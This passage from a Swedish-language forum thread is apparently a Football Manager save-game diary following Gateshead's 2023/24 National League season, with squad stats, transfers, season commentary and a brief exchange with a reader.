Kommentar: Här finns vår kapten Younger, kampen om vem som spelar bredvid honom i mitten är inte över. Wombwell som vänsterback är vi nöjda med, högerbacksplatsen däremot börjar det bli allt viktigare att förbättra.

Mittfältet: (Land, Namn, Ålder, SM, GM, SB, Sty, ÖF, Moderklubb)
 Hayden Lindley, 20år, 45, 1, 7.14, 8, 11.14(+0.14), Man City
 Toby Stephens, 20år, 79, 2, 7.01, 10(-1), 11.43(+0.14), Yeovil
 Danny Greenfield, 22år, 52, 3, 6.84, 8(+1), 11.14(+0.43), Barnsley
 George Abbot, 17år, 0, 0, 0, 8, 10, Tottenham
 Connor Pani, 19år, 71, 13, 7.12, 9, 12.14(+0.85), Gateshead
Kommentar: Vi har samma fyra som förra året, plus en ung förstärkning, även om hela lagdelen får ses som ung. Vi hoppas på att kunna göra klart med en till spelare här, som då kommer utgöra trio med Lindley och Pani.

Anfall/yttrar: (Land, Namn, Ålder, SM, GM, SB, Sty, ÖF, Moderklubb)
 Ellis Taylor, 20år, 13, 2, 6.63, 4, 11.86, Sunderland
 Luke Williams, 30år, 82, 31, 7.42, 7, 9.57(-0.14), Middlesbrough
 Zaid Al-Hussaini, 23år, 38, 7, 6.92, 8(+1), 10.43(+0.14), Derby
 Marc Frame, 15år, 5, 1, 6.78, 5, 10.14, Gateshead
 Adam Campbell, 28år, 82, 16, 6.72, 5, 9.43(-0.28), Newcastle
 Faisu Sangaré, 20år, 48, 14, 6.79, 15(+2), 10(+1.43), Oldham
 Eddie Brown, 22år, 79, 19, 6.8, 12, 10.43, Bolton
 Junior Dixon, 18år, 0, 0, 0, 13, 9.71, Crystal Palace
Kommentar: Antagligen våran svagaste lagdel, och vi lär ställa upp med samma tre som förra säsongen. Williams är ohotad på högerkanten, Campbell på vänstern kommer dock få dela på platsen med unge Frame som vi vill spela så mycket som vi vågar. Längst fram tror jag att Sangaré fortfarande är vassast, men Brown och Dixon kommer få chansen.

Klubbstatistik
Lagstyrka : 8,62(-0,2)
Lagstyrka i division: 18'e(-14)
Lag övrig fysik: 10,21(+0,13)
Lag övrig fysik i division: 15,14(-6,85)
Bankbalans: 586(+570) Kkr
Omsättning: 16,6(+5,4) Mkr


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  


Gateshead 2023/24
Vanarama National League
Del 1, Säsong 3, Avsnitt 2 – Första tredjedelen

Vi fick bästa möjliga premiärlottning i Alfreton, som flyttades upp tillsammans med oss, vi hade inte heller släppt in ett enda mål mot dem på fyra matcher. Vi vann matchen tack vare 15-åringen Frame's två mål och det är fantastiskt att ha en spelare som är yngste målskytt i två divisioner. Vi fortsatte spela klart godkänt för att vara nyuppflyttade, tio poäng på de första åtta matcherna.

Vi hade en fantastisk oktobermånad, som vi gick obesegrade igenom, även om det ska nämnas att vi hade tre ligamatcher i rad mot lag på nedflyttningsplats. Trots att det ser otroligt ut just nu så tror jag att vi kan vänta oss att falla i tabellen under återstoden av säsongen, särskiljt som vår bäste målskytt just nu bara har lyckats med fyra mål.

In:
 DM/MC Kevin Dawson, 33år, 0kr, Gloucester City
 DC/MC Andy Chandler, 16år, Uppflyttad U18
Kommentar: En välmeriterad herre med över 350 matcher i bagaget, kommer in för fylla ut mittfältet och för hans rutin enbart att hjälpa oss. Chandler tog vi upp för att främja hans utveckling, och han kommer främst nyttjas i cuperna.


   
raca14 reacted
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  


Gateshead 2023/24
Vanarama National League
Del 1, Säsong 3, Avsnitt 3 – Andra tredjedelen

Faisu Sangaré har nog på allvar slagit sig in i Liberias landslag, han var delaktig i fyra av fyra kvalmatcher till vm, och i den sista gjorda han sina två första mål mot Algeriet. Mycket roligt även om han inte imponerat för oss i år. Någon som imponerade var Luke Williams i matchen mot Kings Lynn, med tre assists och ett mål så är han den enda jag minns som fått 10.0 i betyg för mig på FM. Kevin Dawson åkte på en, antagligen, karriäravslutande höftskada. Vår första anblick på ungdomsintaget gav att det skulle bli en FEM-stjärnig kull, samtidigt som vi var och nosade på en kvalplats.

Vi blev tagna tillbaka till verkligheten av Barnet, med en 1-5 förlust, där vi märkligt nog var det klart bättre laget på allt utom just att göra mål. Vi har dock fortsatt spela bra boll och jag skulle vilja säga redan nu att vi klarat oss från nedflyttning, som dock lett till ett oväntat högt intresse för våra spelares tjänster. Som tidigare har vi ingen riktig målskytt dock, fem mål som max hittills.

Ut:
 Hayden Lindley, 21år, 68SM, 1GM, 7.11AVR, 300-500Kkr, Burton Albion
 Tyler Fredricson, 18år,14SM, 6.97AVR, 300Kkr, Peterborough
 Jordan Boon, 23år, 81SM, 6.83AVR, Lån, Altrincham
 Zaid Al-Hussaini, 23år, 48SM, 7GM, 6.87AVR, Lån, South Shields
Kommentar: Lindley-försäljningen kritiserades av alla, men jag kunde neka honom att gå till en League 1 klubb, dock är han kvar på lån resten av säsongen och Burton ser ut att trilla ur, dessutom har vi 50% på en eventuell vidareförsäljning. Fredricson går på liknande klausuler, men han går till Championship, och jag ska säga så här, antingen har vi eller så har Peterborough gravt missbedömt hans potential. Boon och Al-Hussaini lämnar antagligen för gott då de inte varit nöjda med sin speltid i år, sitter båda två på utgående kontrakt.


   
TommyE and Kristijan reacted
SvaraCitera
(@jq90power)
New Member
Blev medlem: 2 år sedan
Inlägg: 1
 

Det här är så bra, kliar i fingrarna att starta upp något liknande 😀


   
SvaraCitera
(@chrahl)
Trusted Member
Blev medlem: 2 år sedan
Inlägg: 49
Topic starter  
Postad av: @jq90power

Det här är så bra, kliar i fingrarna att starta upp något liknande 😀

Tack så mycket, det värmer 😀


   
SvaraCitera
Sida 1 / 3
Share: